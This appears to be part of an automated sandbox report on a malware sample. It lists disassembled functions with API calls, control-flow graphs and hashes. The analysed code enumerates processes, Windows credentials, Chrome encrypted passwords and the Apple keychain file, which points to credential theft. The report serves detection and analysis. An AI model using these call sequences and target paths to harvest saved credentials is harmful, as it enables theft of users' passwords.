                                                                                                                                                                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 659 413e6a-413e76 655->659 656->655 661 413e46-413e5c GetProcAddress 656->661 657->658 658->639 659->651 661->655 663->642
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 912665193-1740548384
                                                                                                                                                                                                                    • Opcode ID: 05c61bdc91198e39abb6d6ee7ce09e8b8423f2cda011bdf5068888dae1005bc1
                                                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c61bdc91198e39abb6d6ee7ce09e8b8423f2cda011bdf5068888dae1005bc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406E8F Relevance: 3.4, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                                      • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2420179184-0
                                                                                                                                                                                                                    • Opcode ID: 012147614db75ad7d67ccecdea64e9ae07fb8256dddfad28ba7583e0197446fa
                                                                                                                                                                                                                    • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 012147614db75ad7d67ccecdea64e9ae07fb8256dddfad28ba7583e0197446fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                    • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 485 40bb3c 482->485 486 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->486 483->440 485->486 486->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                                                    • API String ID: 170802307-2783969131
                                                                                                                                                                                                                    • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
